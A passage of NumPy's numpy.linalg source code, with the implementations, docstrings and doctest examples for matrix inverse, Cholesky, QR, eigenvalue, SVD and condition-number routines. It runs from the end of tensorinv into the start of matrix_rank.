If `a` is singular or not 'square' (in the above sense).
See Also
--------
numpy.tensordot, tensorsolve
Examples
--------
>>> a = np.eye(4*6)
>>> a.shape = (4, 6, 8, 3)
>>> ainv = np.linalg.tensorinv(a, ind=2)
>>> ainv.shape
(8, 3, 4, 6)
>>> b = np.random.randn(4, 6)
>>> np.allclose(np.tensordot(ainv, b), np.linalg.tensorsolve(a, b))
True
>>> a = np.eye(4*6)
>>> a.shape = (24, 8, 3)
>>> ainv = np.linalg.tensorinv(a, ind=1)
>>> ainv.shape
(8, 3, 24)
>>> b = np.random.randn(24)
>>> np.allclose(np.tensordot(ainv, b, 1), np.linalg.tensorsolve(a, b))
True
"""
a = asarray(a)
oldshape = a.shape
prod = 1
if ind > 0:
invshape = oldshape[ind:] + oldshape[:ind]
for k in oldshape[ind:]:
prod *= k
else:
raise ValueError("Invalid ind argument.")
a = a.reshape(prod, -1)
ia = inv(a)
return ia.reshape(*invshape)
# Matrix inversion
def inv(a):
"""
Compute the (multiplicative) inverse of a matrix.
Given a square matrix `a`, return the matrix `ainv` satisfying
``dot(a, ainv) = dot(ainv, a) = eye(a.shape[0])``.
Parameters
----------
a : (..., M, M) array_like
Matrix to be inverted.
Returns
-------
ainv : (..., M, M) ndarray or matrix
(Multiplicative) inverse of the matrix `a`.
Raises
------
LinAlgError
If `a` is not square or inversion fails.
Notes
-----
.. versionadded:: 1.8.0
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
Examples
--------
>>> from numpy.linalg import inv
>>> a = np.array([[1., 2.], [3., 4.]])
>>> ainv = inv(a)
>>> np.allclose(np.dot(a, ainv), np.eye(2))
True
>>> np.allclose(np.dot(ainv, a), np.eye(2))
True
If a is a matrix object, then the return value is a matrix as well:
>>> ainv = inv(np.matrix(a))
>>> ainv
matrix([[-2. , 1. ],
[ 1.5, -0.5]])
Inverses of several matrices can be computed at once:
>>> a = np.array([[[1., 2.], [3., 4.]], [[1, 3], [3, 5]]])
>>> inv(a)
array([[[-2. , 1. ],
[ 1.5, -0.5]],
[[-5. , 2. ],
[ 3. , -1. ]]])
"""
a, wrap = _makearray(a)
_assertRankAtLeast2(a)
_assertNdSquareness(a)
t, result_t = _commonType(a)
if a.shape[-1] == 0:
# The inner array is 0x0, the ufunc cannot handle this case
return wrap(empty_like(a, dtype=result_t))
signature = 'D->D' if isComplexType(t) else 'd->d'
extobj = get_linalg_error_extobj(_raise_linalgerror_singular)
ainv = _umath_linalg.inv(a, signature=signature, extobj=extobj)
return wrap(ainv.astype(result_t, copy=False))
# Cholesky decomposition
def cholesky(a):
"""
Cholesky decomposition.
Return the Cholesky decomposition, `L * L.H`, of the square matrix `a`,
where `L` is lower-triangular and .H is the conjugate transpose operator
(which is the ordinary transpose if `a` is real-valued). `a` must be
Hermitian (symmetric if real-valued) and positive-definite. Only `L` is
actually returned.
Parameters
----------
a : (..., M, M) array_like
Hermitian (symmetric if all elements are real), positive-definite
input matrix.
Returns
-------
L : (..., M, M) array_like
Upper or lower-triangular Cholesky factor of `a`. Returns a
matrix object if `a` is a matrix object.
Raises
------
LinAlgError
If the decomposition fails, for example, if `a` is not
positive-definite.
Notes
-----
.. versionadded:: 1.8.0
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
The Cholesky decomposition is often used as a fast way of solving
.. math:: A \\mathbf{x} = \\mathbf{b}
(when `A` is both Hermitian/symmetric and positive-definite).
First, we solve for :math:`\\mathbf{y}` in
.. math:: L \\mathbf{y} = \\mathbf{b},
and then for :math:`\\mathbf{x}` in
.. math:: L.H \\mathbf{x} = \\mathbf{y}.
Examples
--------
>>> A = np.array([[1,-2j],[2j,5]])
>>> A
array([[ 1.+0.j, 0.-2.j],
[ 0.+2.j, 5.+0.j]])
>>> L = np.linalg.cholesky(A)
>>> L
array([[ 1.+0.j, 0.+0.j],
[ 0.+2.j, 1.+0.j]])
>>> np.dot(L, L.T.conj()) # verify that L * L.H = A
array([[ 1.+0.j, 0.-2.j],
[ 0.+2.j, 5.+0.j]])
>>> A = [[1,-2j],[2j,5]] # what happens if A is only array_like?
>>> np.linalg.cholesky(A) # an ndarray object is returned
array([[ 1.+0.j, 0.+0.j],
[ 0.+2.j, 1.+0.j]])
>>> # But a matrix object is returned if A is a matrix object
>>> LA.cholesky(np.matrix(A))
matrix([[ 1.+0.j, 0.+0.j],
[ 0.+2.j, 1.+0.j]])
"""
extobj = get_linalg_error_extobj(_raise_linalgerror_nonposdef)
gufunc = _umath_linalg.cholesky_lo
a, wrap = _makearray(a)
_assertRankAtLeast2(a)
_assertNdSquareness(a)
t, result_t = _commonType(a)
signature = 'D->D' if isComplexType(t) else 'd->d'
r = gufunc(a, signature=signature, extobj=extobj)
return wrap(r.astype(result_t, copy=False))
# QR decompostion
def qr(a, mode='reduced'):
"""
Compute the qr factorization of a matrix.
Factor the matrix `a` as *qr*, where `q` is orthonormal and `r` is
upper-triangular.
Parameters
----------
a : array_like, shape (M, N)
Matrix to be factored.
mode : {'reduced', 'complete', 'r', 'raw', 'full', 'economic'}, optional
If K = min(M, N), then
'reduced' : returns q, r with dimensions (M, K), (K, N) (default)
'complete' : returns q, r with dimensions (M, M), (M, N)
'r' : returns r only with dimensions (K, N)
'raw' : returns h, tau with dimensions (N, M), (K,)
'full' : alias of 'reduced', deprecated
'economic' : returns h from 'raw', deprecated.
The options 'reduced', 'complete, and 'raw' are new in numpy 1.8,
see the notes for more information. The default is 'reduced' and to
maintain backward compatibility with earlier versions of numpy both
it and the old default 'full' can be omitted. Note that array h
returned in 'raw' mode is transposed for calling Fortran. The
'economic' mode is deprecated. The modes 'full' and 'economic' may
be passed using only the first letter for backwards compatibility,
but all others must be spelled out. See the Notes for more
explanation.
Returns
-------
q : ndarray of float or complex, optional
A matrix with orthonormal columns. When mode = 'complete' the
result is an orthogonal/unitary matrix depending on whether or not
a is real/complex. The determinant may be either +/- 1 in that
case.
r : ndarray of float or complex, optional
The upper-triangular matrix.
(h, tau) : ndarrays of np.double or np.cdouble, optional
The array h contains the Householder reflectors that generate q
along with r. The tau array contains scaling factors for the
reflectors. In the deprecated 'economic' mode only h is returned.
Raises
------
LinAlgError
If factoring fails.
Notes
-----
This is an interface to the LAPACK routines dgeqrf, zgeqrf,
dorgqr, and zungqr.
For more information on the qr factorization, see for example:
http://en.wikipedia.org/wiki/QR_factorization
Subclasses of `ndarray` are preserved except for the 'raw' mode. So if
`a` is of type `matrix`, all the return values will be matrices too.
New 'reduced', 'complete', and 'raw' options for mode were added in
NumPy 1.8.0 and the old option 'full' was made an alias of 'reduced'. In
addition the options 'full' and 'economic' were deprecated. Because
'full' was the previous default and 'reduced' is the new default,
backward compatibility can be maintained by letting `mode` default.
The 'raw' option was added so that LAPACK routines that can multiply
arrays by q using the Householder reflectors can be used. Note that in
this case the returned arrays are of type np.double or np.cdouble and
the h array is transposed to be FORTRAN compatible. No routines using
the 'raw' return are currently exposed by numpy, but some are available
in lapack_lite and just await the necessary work.
Examples
--------
>>> a = np.random.randn(9, 6)
>>> q, r = np.linalg.qr(a)
>>> np.allclose(a, np.dot(q, r)) # a does equal qr
True
>>> r2 = np.linalg.qr(a, mode='r')
>>> r3 = np.linalg.qr(a, mode='economic')
>>> np.allclose(r, r2) # mode='r' returns the same r as mode='full'
True
>>> # But only triu parts are guaranteed equal when mode='economic'
>>> np.allclose(r, np.triu(r3[:6,:6], k=0))
True
Example illustrating a common use of `qr`: solving of least squares
problems
What are the least-squares-best `m` and `y0` in ``y = y0 + mx`` for
the following data: {(0,1), (1,0), (1,2), (2,1)}. (Graph the points
and you'll see that it should be y0 = 0, m = 1.) The answer is provided
by solving the over-determined matrix equation ``Ax = b``, where::
A = array([[0, 1], [1, 1], [1, 1], [2, 1]])
x = array([[y0], [m]])
b = array([[1], [0], [2], [1]])
If A = qr such that q is orthonormal (which is always possible via
Gram-Schmidt), then ``x = inv(r) * (q.T) * b``. (In numpy practice,
however, we simply use `lstsq`.)
>>> A = np.array([[0, 1], [1, 1], [1, 1], [2, 1]])
>>> A
array([[0, 1],
[1, 1],
[1, 1],
[2, 1]])
>>> b = np.array([1, 0, 2, 1])
>>> q, r = LA.qr(A)
>>> p = np.dot(q.T, b)
>>> np.dot(LA.inv(r), p)
array([ 1.1e-16, 1.0e+00])
"""
if mode not in ('reduced', 'complete', 'r', 'raw'):
if mode in ('f', 'full'):
# 2013-04-01, 1.8
msg = "".join((
"The 'full' option is deprecated in favor of 'reduced'.\n",
"For backward compatibility let mode default."))
warnings.warn(msg, DeprecationWarning, stacklevel=2)
mode = 'reduced'
elif mode in ('e', 'economic'):
# 2013-04-01, 1.8
msg = "The 'economic' option is deprecated."
warnings.warn(msg, DeprecationWarning, stacklevel=2)
mode = 'economic'
else:
raise ValueError("Unrecognized mode '%s'" % mode)
a, wrap = _makearray(a)
_assertRank2(a)
_assertNoEmpty2d(a)
m, n = a.shape
t, result_t = _commonType(a)
a = _fastCopyAndTranspose(t, a)
a = _to_native_byte_order(a)
mn = min(m, n)
tau = zeros((mn,), t)
if isComplexType(t):
lapack_routine = lapack_lite.zgeqrf
routine_name = 'zgeqrf'
else:
lapack_routine = lapack_lite.dgeqrf
routine_name = 'dgeqrf'
# calculate optimal size of work data 'work'
lwork = 1
work = zeros((lwork,), t)
results = lapack_routine(m, n, a, m, tau, work, -1, 0)
if results['info'] != 0:
raise LinAlgError('%s returns %d' % (routine_name, results['info']))
# do qr decomposition
lwork = int(abs(work[0]))
work = zeros((lwork,), t)
results = lapack_routine(m, n, a, m, tau, work, lwork, 0)
if results['info'] != 0:
raise LinAlgError('%s returns %d' % (routine_name, results['info']))
# handle modes that don't return q
if mode == 'r':
r = _fastCopyAndTranspose(result_t, a[:, :mn])
return wrap(triu(r))
if mode == 'raw':
return a, tau
if mode == 'economic':
if t != result_t :
a = a.astype(result_t, copy=False)
return wrap(a.T)
# generate q from a
if mode == 'complete' and m > n:
mc = m
q = empty((m, m), t)
else:
mc = mn
q = empty((n, m), t)
q[:n] = a
if isComplexType(t):
lapack_routine = lapack_lite.zungqr
routine_name = 'zungqr'
else:
lapack_routine = lapack_lite.dorgqr
routine_name = 'dorgqr'
# determine optimal lwork
lwork = 1
work = zeros((lwork,), t)
results = lapack_routine(m, mc, mn, q, m, tau, work, -1, 0)
if results['info'] != 0:
raise LinAlgError('%s returns %d' % (routine_name, results['info']))
# compute q
lwork = int(abs(work[0]))
work = zeros((lwork,), t)
results = lapack_routine(m, mc, mn, q, m, tau, work, lwork, 0)
if results['info'] != 0:
raise LinAlgError('%s returns %d' % (routine_name, results['info']))
q = _fastCopyAndTranspose(result_t, q[:mc])
r = _fastCopyAndTranspose(result_t, a[:, :mc])
return wrap(q), wrap(triu(r))
# Eigenvalues
def eigvals(a):
"""
Compute the eigenvalues of a general matrix.
Main difference between `eigvals` and `eig`: the eigenvectors aren't
returned.
Parameters
----------
a : (..., M, M) array_like
A complex- or real-valued matrix whose eigenvalues will be computed.
Returns
-------
w : (..., M,) ndarray
The eigenvalues, each repeated according to its multiplicity.
They are not necessarily ordered, nor are they necessarily
real for real matrices.
Raises
------
LinAlgError
If the eigenvalue computation does not converge.
See Also
--------
eig : eigenvalues and right eigenvectors of general arrays
eigvalsh : eigenvalues of symmetric or Hermitian arrays.
eigh : eigenvalues and eigenvectors of symmetric/Hermitian arrays.
Notes
-----
.. versionadded:: 1.8.0
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
This is implemented using the _geev LAPACK routines which compute
the eigenvalues and eigenvectors of general square arrays.
Examples
--------
Illustration, using the fact that the eigenvalues of a diagonal matrix
are its diagonal elements, that multiplying a matrix on the left
by an orthogonal matrix, `Q`, and on the right by `Q.T` (the transpose
of `Q`), preserves the eigenvalues of the "middle" matrix. In other words,
if `Q` is orthogonal, then ``Q * A * Q.T`` has the same eigenvalues as
``A``:
>>> from numpy import linalg as LA
>>> x = np.random.random()
>>> Q = np.array([[np.cos(x), -np.sin(x)], [np.sin(x), np.cos(x)]])
>>> LA.norm(Q[0, :]), LA.norm(Q[1, :]), np.dot(Q[0, :],Q[1, :])
(1.0, 1.0, 0.0)
Now multiply a diagonal matrix by Q on one side and by Q.T on the other:
>>> D = np.diag((-1,1))
>>> LA.eigvals(D)
array([-1., 1.])
>>> A = np.dot(Q, D)
>>> A = np.dot(A, Q.T)
>>> LA.eigvals(A)
array([ 1., -1.])
"""
a, wrap = _makearray(a)
_assertRankAtLeast2(a)
_assertNdSquareness(a)
_assertFinite(a)
t, result_t = _commonType(a)
if _isEmpty2d(a):
return empty(a.shape[-1:], dtype=result_t)
extobj = get_linalg_error_extobj(
_raise_linalgerror_eigenvalues_nonconvergence)
signature = 'D->D' if isComplexType(t) else 'd->D'
w = _umath_linalg.eigvals(a, signature=signature, extobj=extobj)
if not isComplexType(t):
if all(w.imag == 0):
w = w.real
result_t = _realType(result_t)
else:
result_t = _complexType(result_t)
return w.astype(result_t, copy=False)
def eigvalsh(a, UPLO='L'):
"""
Compute the eigenvalues of a Hermitian or real symmetric matrix.
Main difference from eigh: the eigenvectors are not computed.
Parameters
----------
a : (..., M, M) array_like
A complex- or real-valued matrix whose eigenvalues are to be
computed.
UPLO : {'L', 'U'}, optional
Specifies whether the calculation is done with the lower triangular
part of `a` ('L', default) or the upper triangular part ('U').
Irrespective of this value only the real parts of the diagonal will
be considered in the computation to preserve the notion of a Hermitian
matrix. It therefore follows that the imaginary part of the diagonal
will always be treated as zero.
Returns
-------
w : (..., M,) ndarray
The eigenvalues in ascending order, each repeated according to
its multiplicity.
Raises
------
LinAlgError
If the eigenvalue computation does not converge.
See Also
--------
eigh : eigenvalues and eigenvectors of symmetric/Hermitian arrays.
eigvals : eigenvalues of general real or complex arrays.
eig : eigenvalues and right eigenvectors of general real or complex
arrays.
Notes
-----
.. versionadded:: 1.8.0
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
The eigenvalues are computed using LAPACK routines _syevd, _heevd
Examples
--------
>>> from numpy import linalg as LA
>>> a = np.array([[1, -2j], [2j, 5]])
>>> LA.eigvalsh(a)
array([ 0.17157288, 5.82842712])
>>> # demonstrate the treatment of the imaginary part of the diagonal
>>> a = np.array([[5+2j, 9-2j], [0+2j, 2-1j]])
>>> a
array([[ 5.+2.j, 9.-2.j],
[ 0.+2.j, 2.-1.j]])
>>> # with UPLO='L' this is numerically equivalent to using LA.eigvals()
>>> # with:
>>> b = np.array([[5.+0.j, 0.-2.j], [0.+2.j, 2.-0.j]])
>>> b
array([[ 5.+0.j, 0.-2.j],
[ 0.+2.j, 2.+0.j]])
>>> wa = LA.eigvalsh(a)
>>> wb = LA.eigvals(b)
>>> wa; wb
array([ 1., 6.])
array([ 6.+0.j, 1.+0.j])
"""
UPLO = UPLO.upper()
if UPLO not in ('L', 'U'):
raise ValueError("UPLO argument must be 'L' or 'U'")
extobj = get_linalg_error_extobj(
_raise_linalgerror_eigenvalues_nonconvergence)
if UPLO == 'L':
gufunc = _umath_linalg.eigvalsh_lo
else:
gufunc = _umath_linalg.eigvalsh_up
a, wrap = _makearray(a)
_assertRankAtLeast2(a)
_assertNdSquareness(a)
t, result_t = _commonType(a)
if _isEmpty2d(a):
return empty(a.shape[-1:], dtype=result_t)
signature = 'D->d' if isComplexType(t) else 'd->d'
w = gufunc(a, signature=signature, extobj=extobj)
return w.astype(_realType(result_t), copy=False)
def _convertarray(a):
t, result_t = _commonType(a)
a = _fastCT(a.astype(t))
return a, t, result_t
# Eigenvectors
def eig(a):
"""
Compute the eigenvalues and right eigenvectors of a square array.
Parameters
----------
a : (..., M, M) array
Matrices for which the eigenvalues and right eigenvectors will
be computed
Returns
-------
w : (..., M) array
The eigenvalues, each repeated according to its multiplicity.
The eigenvalues are not necessarily ordered. The resulting
array will be of complex type, unless the imaginary part is
zero in which case it will be cast to a real type. When `a`
is real the resulting eigenvalues will be real (0 imaginary
part) or occur in conjugate pairs
v : (..., M, M) array
The normalized (unit "length") eigenvectors, such that the
column ``v[:,i]`` is the eigenvector corresponding to the
eigenvalue ``w[i]``.
Raises
------
LinAlgError
If the eigenvalue computation does not converge.
See Also
--------
eigvals : eigenvalues of a non-symmetric array.
eigh : eigenvalues and eigenvectors of a symmetric or Hermitian
(conjugate symmetric) array.
eigvalsh : eigenvalues of a symmetric or Hermitian (conjugate symmetric)
array.
Notes
-----
.. versionadded:: 1.8.0
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
This is implemented using the _geev LAPACK routines which compute
the eigenvalues and eigenvectors of general square arrays.
The number `w` is an eigenvalue of `a` if there exists a vector
`v` such that ``dot(a,v) = w * v``. Thus, the arrays `a`, `w`, and
`v` satisfy the equations ``dot(a[:,:], v[:,i]) = w[i] * v[:,i]``
for :math:`i \\in \\{0,...,M-1\\}`.
The array `v` of eigenvectors may not be of maximum rank, that is, some
of the columns may be linearly dependent, although round-off error may
obscure that fact. If the eigenvalues are all different, then theoretically
the eigenvectors are linearly independent. Likewise, the (complex-valued)
matrix of eigenvectors `v` is unitary if the matrix `a` is normal, i.e.,
if ``dot(a, a.H) = dot(a.H, a)``, where `a.H` denotes the conjugate
transpose of `a`.
Finally, it is emphasized that `v` consists of the *right* (as in
right-hand side) eigenvectors of `a`. A vector `y` satisfying
``dot(y.T, a) = z * y.T`` for some number `z` is called a *left*
eigenvector of `a`, and, in general, the left and right eigenvectors
of a matrix are not necessarily the (perhaps conjugate) transposes
of each other.
References
----------
G. Strang, *Linear Algebra and Its Applications*, 2nd Ed., Orlando, FL,
Academic Press, Inc., 1980, Various pp.
Examples
--------
>>> from numpy import linalg as LA
(Almost) trivial example with real e-values and e-vectors.
>>> w, v = LA.eig(np.diag((1, 2, 3)))
>>> w; v
array([ 1., 2., 3.])
array([[ 1., 0., 0.],
[ 0., 1., 0.],
[ 0., 0., 1.]])
Real matrix possessing complex e-values and e-vectors; note that the
e-values are complex conjugates of each other.
>>> w, v = LA.eig(np.array([[1, -1], [1, 1]]))
>>> w; v
array([ 1. + 1.j, 1. - 1.j])
array([[ 0.70710678+0.j , 0.70710678+0.j ],
[ 0.00000000-0.70710678j, 0.00000000+0.70710678j]])
Complex-valued matrix with real e-values (but complex-valued e-vectors);
note that a.conj().T = a, i.e., a is Hermitian.
>>> a = np.array([[1, 1j], [-1j, 1]])
>>> w, v = LA.eig(a)
>>> w; v
array([ 2.00000000e+00+0.j, 5.98651912e-36+0.j]) # i.e., {2, 0}
array([[ 0.00000000+0.70710678j, 0.70710678+0.j ],
[ 0.70710678+0.j , 0.00000000+0.70710678j]])
Be careful about round-off error!
>>> a = np.array([[1 + 1e-9, 0], [0, 1 - 1e-9]])
>>> # Theor. e-values are 1 +/- 1e-9
>>> w, v = LA.eig(a)
>>> w; v
array([ 1., 1.])
array([[ 1., 0.],
[ 0., 1.]])
"""
a, wrap = _makearray(a)
_assertRankAtLeast2(a)
_assertNdSquareness(a)
_assertFinite(a)
t, result_t = _commonType(a)
if _isEmpty2d(a):
w = empty(a.shape[-1:], dtype=result_t)
vt = empty(a.shape, dtype=result_t)
return w, wrap(vt)
extobj = get_linalg_error_extobj(
_raise_linalgerror_eigenvalues_nonconvergence)
signature = 'D->DD' if isComplexType(t) else 'd->DD'
w, vt = _umath_linalg.eig(a, signature=signature, extobj=extobj)
if not isComplexType(t) and all(w.imag == 0.0):
w = w.real
vt = vt.real
result_t = _realType(result_t)
else:
result_t = _complexType(result_t)
vt = vt.astype(result_t, copy=False)
return w.astype(result_t, copy=False), wrap(vt)
def eigh(a, UPLO='L'):
"""
Return the eigenvalues and eigenvectors of a Hermitian or symmetric matrix.
Returns two objects, a 1-D array containing the eigenvalues of `a`, and
a 2-D square array or matrix (depending on the input type) of the
corresponding eigenvectors (in columns).
Parameters
----------
a : (..., M, M) array
Hermitian/Symmetric matrices whose eigenvalues and
eigenvectors are to be computed.
UPLO : {'L', 'U'}, optional
Specifies whether the calculation is done with the lower triangular
part of `a` ('L', default) or the upper triangular part ('U').
Irrespective of this value only the real parts of the diagonal will
be considered in the computation to preserve the notion of a Hermitian
matrix. It therefore follows that the imaginary part of the diagonal
will always be treated as zero.
Returns
-------
w : (..., M) ndarray
The eigenvalues in ascending order, each repeated according to
its multiplicity.
v : {(..., M, M) ndarray, (..., M, M) matrix}
The column ``v[:, i]`` is the normalized eigenvector corresponding
to the eigenvalue ``w[i]``. Will return a matrix object if `a` is
a matrix object.
Raises
------
LinAlgError
If the eigenvalue computation does not converge.
See Also
--------
eigvalsh : eigenvalues of symmetric or Hermitian arrays.
eig : eigenvalues and right eigenvectors for non-symmetric arrays.
eigvals : eigenvalues of non-symmetric arrays.
Notes
-----
.. versionadded:: 1.8.0
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
The eigenvalues/eigenvectors are computed using LAPACK routines _syevd,
_heevd
The eigenvalues of real symmetric or complex Hermitian matrices are
always real. [1]_ The array `v` of (column) eigenvectors is unitary
and `a`, `w`, and `v` satisfy the equations
``dot(a, v[:, i]) = w[i] * v[:, i]``.
References
----------
.. [1] G. Strang, *Linear Algebra and Its Applications*, 2nd Ed., Orlando,
FL, Academic Press, Inc., 1980, pg. 222.
Examples
--------
>>> from numpy import linalg as LA
>>> a = np.array([[1, -2j], [2j, 5]])
>>> a
array([[ 1.+0.j, 0.-2.j],
[ 0.+2.j, 5.+0.j]])
>>> w, v = LA.eigh(a)
>>> w; v
array([ 0.17157288, 5.82842712])
array([[-0.92387953+0.j , -0.38268343+0.j ],
[ 0.00000000+0.38268343j, 0.00000000-0.92387953j]])
>>> np.dot(a, v[:, 0]) - w[0] * v[:, 0] # verify 1st e-val/vec pair
array([2.77555756e-17 + 0.j, 0. + 1.38777878e-16j])
>>> np.dot(a, v[:, 1]) - w[1] * v[:, 1] # verify 2nd e-val/vec pair
array([ 0.+0.j, 0.+0.j])
>>> A = np.matrix(a) # what happens if input is a matrix object
>>> A
matrix([[ 1.+0.j, 0.-2.j],
[ 0.+2.j, 5.+0.j]])
>>> w, v = LA.eigh(A)
>>> w; v
array([ 0.17157288, 5.82842712])
matrix([[-0.92387953+0.j , -0.38268343+0.j ],
[ 0.00000000+0.38268343j, 0.00000000-0.92387953j]])
>>> # demonstrate the treatment of the imaginary part of the diagonal
>>> a = np.array([[5+2j, 9-2j], [0+2j, 2-1j]])
>>> a
array([[ 5.+2.j, 9.-2.j],
[ 0.+2.j, 2.-1.j]])
>>> # with UPLO='L' this is numerically equivalent to using LA.eig() with:
>>> b = np.array([[5.+0.j, 0.-2.j], [0.+2.j, 2.-0.j]])
>>> b
array([[ 5.+0.j, 0.-2.j],
[ 0.+2.j, 2.+0.j]])
>>> wa, va = LA.eigh(a)
>>> wb, vb = LA.eig(b)
>>> wa; wb
array([ 1., 6.])
array([ 6.+0.j, 1.+0.j])
>>> va; vb
array([[-0.44721360-0.j , -0.89442719+0.j ],
[ 0.00000000+0.89442719j, 0.00000000-0.4472136j ]])
array([[ 0.89442719+0.j , 0.00000000-0.4472136j],
[ 0.00000000-0.4472136j, 0.89442719+0.j ]])
"""
UPLO = UPLO.upper()
if UPLO not in ('L', 'U'):
raise ValueError("UPLO argument must be 'L' or 'U'")
a, wrap = _makearray(a)
_assertRankAtLeast2(a)
_assertNdSquareness(a)
t, result_t = _commonType(a)
if _isEmpty2d(a):
w = empty(a.shape[-1:], dtype=result_t)
vt = empty(a.shape, dtype=result_t)
return w, wrap(vt)
extobj = get_linalg_error_extobj(
_raise_linalgerror_eigenvalues_nonconvergence)
if UPLO == 'L':
gufunc = _umath_linalg.eigh_lo
else:
gufunc = _umath_linalg.eigh_up
signature = 'D->dD' if isComplexType(t) else 'd->dd'
w, vt = gufunc(a, signature=signature, extobj=extobj)
w = w.astype(_realType(result_t), copy=False)
vt = vt.astype(result_t, copy=False)
return w, wrap(vt)
# Singular value decomposition
def svd(a, full_matrices=1, compute_uv=1):
"""
Singular Value Decomposition.
Factors the matrix `a` as ``u * np.diag(s) * v``, where `u` and `v`
are unitary and `s` is a 1-d array of `a`'s singular values.
Parameters
----------
a : (..., M, N) array_like
A real or complex matrix of shape (`M`, `N`) .
full_matrices : bool, optional
If True (default), `u` and `v` have the shapes (`M`, `M`) and
(`N`, `N`), respectively. Otherwise, the shapes are (`M`, `K`)
and (`K`, `N`), respectively, where `K` = min(`M`, `N`).
compute_uv : bool, optional
Whether or not to compute `u` and `v` in addition to `s`. True
by default.
Returns
-------
u : { (..., M, M), (..., M, K) } array
Unitary matrices. The actual shape depends on the value of
``full_matrices``. Only returned when ``compute_uv`` is True.
s : (..., K) array
The singular values for every matrix, sorted in descending order.
v : { (..., N, N), (..., K, N) } array
Unitary matrices. The actual shape depends on the value of
``full_matrices``. Only returned when ``compute_uv`` is True.
Raises
------
LinAlgError
If SVD computation does not converge.
Notes
-----
.. versionadded:: 1.8.0
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
The decomposition is performed using LAPACK routine _gesdd
The SVD is commonly written as ``a = U S V.H``. The `v` returned
by this function is ``V.H`` and ``u = U``.
If ``U`` is a unitary matrix, it means that it
satisfies ``U.H = inv(U)``.
The rows of `v` are the eigenvectors of ``a.H a``. The columns
of `u` are the eigenvectors of ``a a.H``. For row ``i`` in
`v` and column ``i`` in `u`, the corresponding eigenvalue is
``s[i]**2``.
If `a` is a `matrix` object (as opposed to an `ndarray`), then so
are all the return values.
Examples
--------
>>> a = np.random.randn(9, 6) + 1j*np.random.randn(9, 6)
Reconstruction based on full SVD:
>>> U, s, V = np.linalg.svd(a, full_matrices=True)
>>> U.shape, V.shape, s.shape
((9, 9), (6, 6), (6,))
>>> S = np.zeros((9, 6), dtype=complex)
>>> S[:6, :6] = np.diag(s)
>>> np.allclose(a, np.dot(U, np.dot(S, V)))
True
Reconstruction based on reduced SVD:
>>> U, s, V = np.linalg.svd(a, full_matrices=False)
>>> U.shape, V.shape, s.shape
((9, 6), (6, 6), (6,))
>>> S = np.diag(s)
>>> np.allclose(a, np.dot(U, np.dot(S, V)))
True
"""
a, wrap = _makearray(a)
_assertNoEmpty2d(a)
_assertRankAtLeast2(a)
t, result_t = _commonType(a)
extobj = get_linalg_error_extobj(_raise_linalgerror_svd_nonconvergence)
m = a.shape[-2]
n = a.shape[-1]
if compute_uv:
if full_matrices:
if m < n:
gufunc = _umath_linalg.svd_m_f
else:
gufunc = _umath_linalg.svd_n_f
else:
if m < n:
gufunc = _umath_linalg.svd_m_s
else:
gufunc = _umath_linalg.svd_n_s
signature = 'D->DdD' if isComplexType(t) else 'd->ddd'
u, s, vt = gufunc(a, signature=signature, extobj=extobj)
u = u.astype(result_t, copy=False)
s = s.astype(_realType(result_t), copy=False)
vt = vt.astype(result_t, copy=False)
return wrap(u), s, wrap(vt)
else:
if m < n:
gufunc = _umath_linalg.svd_m
else:
gufunc = _umath_linalg.svd_n
signature = 'D->d' if isComplexType(t) else 'd->d'
s = gufunc(a, signature=signature, extobj=extobj)
s = s.astype(_realType(result_t), copy=False)
return s
def cond(x, p=None):
"""
Compute the condition number of a matrix.
This function is capable of returning the condition number using
one of seven different norms, depending on the value of `p` (see
Parameters below).
Parameters
----------
x : (..., M, N) array_like
The matrix whose condition number is sought.
p : {None, 1, -1, 2, -2, inf, -inf, 'fro'}, optional
Order of the norm:
===== ============================
p norm for matrices
===== ============================
None 2-norm, computed directly using the ``SVD``
'fro' Frobenius norm
inf max(sum(abs(x), axis=1))
-inf min(sum(abs(x), axis=1))
1 max(sum(abs(x), axis=0))
-1 min(sum(abs(x), axis=0))
2 2-norm (largest sing. value)
-2 smallest singular value
===== ============================
inf means the numpy.inf object, and the Frobenius norm is
the root-of-sum-of-squares norm.
Returns
-------
c : {float, inf}
The condition number of the matrix. May be infinite.
See Also
--------
numpy.linalg.norm
Notes
-----
The condition number of `x` is defined as the norm of `x` times the
norm of the inverse of `x` [1]_; the norm can be the usual L2-norm
(root-of-sum-of-squares) or one of a number of other matrix norms.
References
----------
.. [1] G. Strang, *Linear Algebra and Its Applications*, Orlando, FL,
Academic Press, Inc., 1980, pg. 285.
Examples
--------
>>> from numpy import linalg as LA
>>> a = np.array([[1, 0, -1], [0, 1, 0], [1, 0, 1]])
>>> a
array([[ 1, 0, -1],
[ 0, 1, 0],
[ 1, 0, 1]])
>>> LA.cond(a)
1.4142135623730951
>>> LA.cond(a, 'fro')
3.1622776601683795
>>> LA.cond(a, np.inf)
2.0
>>> LA.cond(a, -np.inf)
1.0
>>> LA.cond(a, 1)
2.0
>>> LA.cond(a, -1)
1.0
>>> LA.cond(a, 2)
1.4142135623730951
>>> LA.cond(a, -2)
0.70710678118654746
>>> min(LA.svd(a, compute_uv=0))*min(LA.svd(LA.inv(a), compute_uv=0))
0.70710678118654746
"""
x = asarray(x) # in case we have a matrix
if p is None:
s = svd(x, compute_uv=False)
return s[..., 0]/s[..., -1]
else:
return norm(x, p, axis=(-2, -1)) * norm(inv(x), p, axis=(-2, -1))
def matrix_rank(M, tol=None):
"""
Return matrix rank of array using SVD method
Rank of the array is the number of SVD singular values of the array that are
greater than `tol`.
Parameters
----------
M : {(M,), (..., M, N)} array_like
input vector or stack of matrices
tol : {None, float}, optional
threshold below which SVD values are considered zero. If `tol` is
None, and ``S`` is an array with singular values for `M`, and
``eps`` is the epsilon value for datatype of ``S``, then `tol` is
set to ``S.max() * max(M.shape) * eps``.
Notes
-----
The default threshold to detect rank deficiency is a test on the magnitude
of the singular values of `M`. By default, we identify singular values less
than ``S.max() * max(M.shape) * eps`` as indicating rank deficiency (with
the symbols defined above). This is the algorithm MATLAB uses [1]. It also
appears in *Numerical recipes* in the discussion of SVD solutions for linear
least squares [2].
This default threshold is designed to detect rank deficiency accounting for
the numerical errors of the SVD computation. Imagine that there is a column
in `M` that is an exact (in floating point) linear combination of other
